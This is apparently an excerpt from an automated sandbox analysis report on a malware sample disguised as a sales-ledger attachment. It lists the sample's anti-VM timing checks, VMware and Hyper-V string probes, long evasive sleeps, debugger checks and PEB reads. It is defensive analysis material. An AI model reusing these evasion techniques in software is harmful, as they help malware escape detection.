Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002B198E4 second address: 0000000002B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002B19B5E second address: 0000000002B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409A90 rdtsc 24_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4734 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2204 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe TID: 5512 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep count: 4734 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep count: 2204 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000019.00000000.347525561.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000019.00000000.335019320.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000019.00000000.348546302.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000019.00000000.335150903.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000019.00000000.349143933.00000000088C3000.00000004.00000001.sdmp Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: AdvancedRun.exe, 00000009.00000002.283016558.0000000000757000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409A90 rdtsc 24_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0040ACD0 LdrLoadDll, 24_2_0040ACD0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0040289F
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov ecx, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122513A mov eax, dword ptr fs:[00000030h] 24_2_0122513A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122513A mov eax, dword ptr fs:[00000030h] 24_2_0122513A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h] 24_2_011F9100
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h] 24_2_011F9100
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h] 24_2_011F9100
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h] 24_2_0121B944
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h] 24_2_0121B944
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h] 24_2_011FB171
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h] 24_2_011FB171
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FC962 mov eax, dword ptr fs:[00000030h] 24_2_011FC962
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012769A6 mov eax, dword ptr fs:[00000030h] 24_2_012769A6
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h] 24_2_012261A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h] 24_2_012261A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121C182 mov eax, dword ptr fs:[00000030h] 24_2_0121C182
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A185 mov eax, dword ptr fs:[00000030h] 24_2_0122A185
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222990 mov eax, dword ptr fs:[00000030h] 24_2_01222990
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012841E8 mov eax, dword ptr fs:[00000030h] 24_2_012841E8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h] 24_2_011FB1E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h] 24_2_011FB1E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h] 24_2_011FB1E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h] 24_2_01277016
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h] 24_2_01277016
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h] 24_2_01277016
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h] 24_2_012C4015
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h] 24_2_012C4015
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B2073 mov eax, dword ptr fs:[00000030h] 24_2_012B2073
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C1074 mov eax, dword ptr fs:[00000030h] 24_2_012C1074
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01210050 mov eax, dword ptr fs:[00000030h] 24_2_01210050
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01210050 mov eax, dword ptr fs:[00000030h] 24_2_01210050
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012390AF mov eax, dword ptr fs:[00000030h] 24_2_012390AF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122F0BF mov ecx, dword ptr fs:[00000030h] 24_2_0122F0BF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h] 24_2_0122F0BF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h] 24_2_0122F0BF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9080 mov eax, dword ptr fs:[00000030h] 24_2_011F9080
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01273884 mov eax, dword ptr fs:[00000030h] 24_2_01273884
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01273884 mov eax, dword ptr fs:[00000030h] 24_2_01273884
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F58EC mov eax, dword ptr fs:[00000030h] 24_2_011F58EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov ecx, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h] 24_2_011F40E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h] 24_2_011F40E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h] 24_2_011F40E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B131B mov eax, dword ptr fs:[00000030h] 24_2_012B131B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FF358 mov eax, dword ptr fs:[00000030h] 24_2_011FF358
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h] 24_2_01223B7A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h] 24_2_01223B7A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FDB40 mov eax, dword ptr fs:[00000030h] 24_2_011FDB40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8B58 mov eax, dword ptr fs:[00000030h] 24_2_012C8B58
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FDB60 mov ecx, dword ptr fs:[00000030h] 24_2_011FDB60
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C5BA5 mov eax, dword ptr fs:[00000030h] 24_2_012C5BA5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h] 24_2_01224BAD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h] 24_2_01224BAD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h] 24_2_01224BAD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B138A mov eax, dword ptr fs:[00000030h] 24_2_012B138A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AD380 mov ecx, dword ptr fs:[00000030h] 24_2_012AD380
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h] 24_2_01201B8F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h] 24_2_01201B8F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122B390 mov eax, dword ptr fs:[00000030h] 24_2_0122B390
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222397 mov eax, dword ptr fs:[00000030h] 24_2_01222397
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121DBE9 mov eax, dword ptr fs:[00000030h] 24_2_0121DBE9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012753CA mov eax, dword ptr fs:[00000030h] 24_2_012753CA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012753CA mov eax, dword ptr fs:[00000030h] 24_2_012753CA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h] 24_2_011FAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h] 24_2_011FAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h] 24_2_01234A2C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h] 24_2_01234A2C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov ecx, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01208A0A mov eax, dword ptr fs:[00000030h] 24_2_01208A0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01213A1C mov eax, dword ptr fs:[00000030h] 24_2_01213A1C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h] 24_2_012BAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h] 24_2_012BAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h] 24_2_012AB260
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h] 24_2_012AB260
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8A62 mov eax, dword ptr fs:[00000030h] 24_2_012C8A62
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123927A mov eax, dword ptr fs:[00000030h] 24_2_0123927A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
